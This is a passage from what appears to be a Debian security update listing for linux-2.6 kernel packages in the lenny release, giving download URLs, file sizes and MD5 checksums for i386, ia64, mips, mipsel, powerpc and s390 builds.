http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 388204 f05bb15f0d5ac59b92c0e7e58666f582 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 407184 759e686be26e57c5fa7831d410a59b42 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 400086 47b28b4325c193b07bd877e849d015c8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 399920 8c8f053d50d3c7e72e5543f9a36fd6d5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 396974 0fae2cc8843879be33a567cd4247d77a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 1594510 86fed72851b3bbd9af666dca50a74718 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 1594836 932befcaafaf934e0d49110cb144933e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 399700 a2824e942fb9f0365c29f32f301da907 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20359926 7c7e0e8cff5215ad2b683dafc3ed6a60 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 3944378 c4c879bbbaa703dc76a8d163cc9d0d00 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 20490380 679b0811cd187d7e624cd089da8a43b1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 20359822 5cee4d1bfbaf186efc124b7aba33e6e0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 3853962 5e3d260ca6e9f5436b12c30a0eeec239 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb Size/MD5 checksum: 20511694 cd40e02a7dd10aa8699a54ae5540c68e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb Size/MD5 checksum: 389638 245b487189ca0af34526b8f770094172 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb Size/MD5 checksum: 3839050 85f7e26766452c9ce8e88d43c83fecbc

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 359070 86419da16f001cb7f6478b592cc0a47f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 108430 edba219dabfb91c9c7b2fa3d9f4a4bc7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 34359310 89151596f07a1d74a7585d5209bc577f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 357818 98556ca82088020d3599d5f2261e7e0d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 358114 b27fddaebd882ea5442fb858f9dfd4bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 34362562 f584be340a1d6fad3d55586d605e20c1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 3689594 b153ada0e53662ce15c1c89bc2adfa56 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 357710 19bddfe6c9db67ac1db5b5542dcd58f1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 34109258 059e79f42c661f2e1549a6354caa43ce http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 34107508 ecaa06007b46aafebb67e3b4f9a05b2d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 357568 00dd418b3433ca1f93f4368191d8b72c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 3657036 814b6e4b81ab9173f027f556615d0bc3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 357550 9f3c74754dc8f874e3815e621e143754 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 750092 4a6ae1dd8acbbf0180c71954694b1526 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 108708 f1285ff67a0f561915765bcb50ecbead http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 3689576 20a59a5041e7647d0391f854686664a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 108462 1c02ca719c0feb638de4f4f5c256eb84 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 357964 c45479bde1eb1f6f5e2c362ff947a0e5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 3657030 4482b2b529976d961f3020c77222693d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 357208 fa7766e518316520ab7dc1272ca58ece http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 34284740 d90557ca07fc3e8c301ac7eecb7af9bd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 34289814 c5bcd6bd38d18693b2f211cda0d4d68e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 108736 ff3225f77a14a14e998443a8cb8d296a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 750184 3fc4607bbae8e1646b2022c405906cb2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb Size/MD5 checksum: 34172758 2c92b359fd81b2698905506af74eed9b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb Size/MD5 checksum: 34170826 bb4ed05b498a4f153ff5ed49d295055a

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 29281456 5b9a8e4a0a9fa48b5cedfcc57839e414 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 296956 9dcc3a6d73cc4703251ad1ae76ee30a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 29278756 9c890b56c619dea8c6786149f065b409 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 297228 c24d99d38ed9c0f76aef1db87ea9927f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 353130 526563ac3ea7cae71a2431d1c16d5148 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 744330 30d4553c7165d0636d44ec819573c378 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 20135908 7852982d46bc9c28f8c6df1f069ebd0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 3893146 cf461075d9af08b66a1565123df5db0f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 108708 9f84a606392f0ea233a6560be5acefd9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 11493164 0f75a57fcc89d5c9e3274d76d3b0dd01 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 255094 aba773b89f23e5b1d39a58486c000d85 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 350880 62f184f11f05d085dd9e5ca8038864d3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 15652112 cd6f08d973b6d56d8ad1d348ead030fe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 280804 a283c8f566d27f8429017cc280fae633 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 254932 62bb2cb1fb9920375c15d7566aa3711d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 744386 dd652dfa4e958776dde0af9554972399 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 23361964 1154ed62d11f482dc7aa0195754dd2df http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 296378 ac0de038db87e9909627f0cc2edeaed9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 3893178 25c2f247293ab5fafb2396d7ebe20be4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 23363494 31066703509d7bbaea31272350df78a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 20135662 777f9ee3f47b55d1faeba8b2a3903942 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 108760 3a0e18806710cf691522c6a0808128e4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 15652726 47e9d348fb7cbb113198a26981601e0c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 108554 22d6bf0c82b4f969af7c9855d8e54198 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 280788 2fc79c75a0e2fc12ec263b902370e10f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 352166 86b7b9b0f7953b14663ac49ba072d395 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 297878 b67b45ea758b284a0d48c00d446cd748 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb Size/MD5 checksum: 20122020 6b407d7fd8efffeaf63d45319db0fc55 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 20122988 3b90f7c4b6f70455de8a5c6fc7668c90 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 350718 673dc7f162bd005127309ecc81421b0c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 11493416 b77c1c4c8bfe696e5de4641b6359b1f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb Size/MD5 checksum: 108606 aa52252ee2852e92c33cec271aff9916

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 3893180 73266c7fc609bf9f750e841875192915 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 22910150 e2748973530548f7159cbf6f538cb4c3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 28415222 3ae3611f1517f2ecfc899d0cbda71e6f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 297088 1f70ee9f4282255390e63065e9fa622a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 108760 717a49d4823040faab42145c1b2e1e41 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 350948 92c44d0ecd82b440afa0e7d741ad5684 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 14949410 0353fee416b7488c848453208a0f4cca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 108708 04c572a258e844e1595f8d810ead5a93 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 19563254 0782f6e31196abc07bbc0290c2b767a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 352038 a8013bf2fa8e126b71bf4c1158f1002c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 744406 c2fbab4a4e1e882b1388f6adc6032213 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 292376 a4e4702b73d9283a5bc26dad7c3323b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 19558208 909b1772ff02ef617734dfcb8bf18747 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 296318 b6730e89326eee6c9306dd1cc7ebc928 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 19567570 094286b9487c516a27a850e08c32931d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 108556 b4bcc6570f0b7337263d34ebd7e7ceb6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 297264 fbb0ada7a1680fb2f00b615186936f73 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 28416038 27237e256488565425ebaa8d6ab781b8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 22910044 ce0baa79dcc512708e04d5dc668e3119 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 108608 7680f595061b4146bedd8a319e0af7ad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 296886 4223f4b9674acc651572e3cb432c8dec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 3893194 5c157b25a27392a97c5aec2d078985df http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 351946 c134f08fc56a4d7288433cba264437e3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 292572 6ddf47b5231ff541a6ebb0cc386228f7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 19556346 01e04778dc95a69e11e6198194985b8f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb Size/MD5 checksum: 744340 dedd7c4693d5227fc726874988b6a0f1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 14949144 dc4f2aa55f036d3d2ffaf92f0e0f1ca3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb Size/MD5 checksum: 350654 1b7fe619ab4fc0cb0df29c3a2675e8b6

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 108752 6bce46cb07333205c6d970db413a51df http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 758014 1f68cb39b3c3d26d654dbbcf17e38570 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 374268 b8682d2fb8d9e75eecb3d046d606d321 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 23659188 e24d0a87309db7d7a63e3273f8432899 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 374612 a2841b95f64a4b7486f431504b992d95 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 23232706 664334238582c7421ca887e155b5114c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 23634322 df1bf16b4f8e6bf59f33fb409bf9f62b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 23480278 adcd1522810051a3adefe3b84df84b1d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 3886604 e7ca971a8ed765aefd349a914bb55a66 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 370296 4e330a4850fda773f6ef212c9cb6b0cf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 23535520 7dc32e3fa484672149c86080ff072315 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 368624 d0a1ad90a03d524d6e5e3fedd5dddf01 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 108790 26a11a94f15ceeb11e29b6d631471170 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 370170 7616bfb6b57b95757a63c4e0b3870ad1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb Size/MD5 checksum: 3851336 6812d0f66042a59ae627cf08398396e6

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 231812 443d9a58058ef675f117774c6acb53e6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 7782010 4150695cebaa7114b588086a85b8d761 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 7843882 49726eeb18d912aae4c501609b06e321 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 233290 ea85fcc3ad76b995206105d1ad0f8f0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 232154 724e6da916fb3eabc419900417e45c10 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 233170 b6a5976881616d1c07212bc6f17ad314 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 231438 9da054d96d343d8c5e4af7a3a7b94a74 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 108544 fa872af4eef01b3c001a1312107b4127 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 108568 d100107291909e29dc1b4026916959c2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 7844118 044d92fce39f973d466a84dab2ced59e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 7780936 aa4394bec7213a65e1c3f59fe637b2d6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 232980 00e17f6e7a6719d0cef0e89fda1d3a76 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 3532850 0ade36f410f94be998164118f36aa832 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 231988 9e9a3e06b018c3aa676ef7ab6af83c59 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 743394 4e8feb51e6eb5fbc8e62895cef2b73cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 3532886 5b7b7e631e3bb226e3baad772169f633 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 231350 371b0d728b1462b23646f59854e179c3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 3565332 fc1be5997c795ab339153d571116ee2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 7491026 a2e9b13bd73fe526a607551cfded3032 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 3565334 2f991b448d637633ff0450d084eda972 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 1631554 1324987d809936d18f08c781d8e66107 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 743468 d0083c16129f2f21574146ad117ec17f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 3533014 213740094d15f4b7f552d543b2aa4518 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 108424 931c2376543c633f7c4fbaa122c4fa59 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 3565296 5763e23f048ece3acac12c334a3aa1dc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 108726 fc1cdbbe5bf3760aab56899b484839b1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 743536 51ef4a41d5b6b58c2df474d41bb97c4f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 1631388 05ca9fa4452242e54c5eddefd70005d3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 1631704 0c1a5fe63cb770950bef2dbc55821e33 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 7491476 7cedc121923d537a208b5217b8d1b96c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 7782028 4a92f28cc6b0f6bdeb2df5686bcf4739 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb Size/MD5 checksum: 7491588 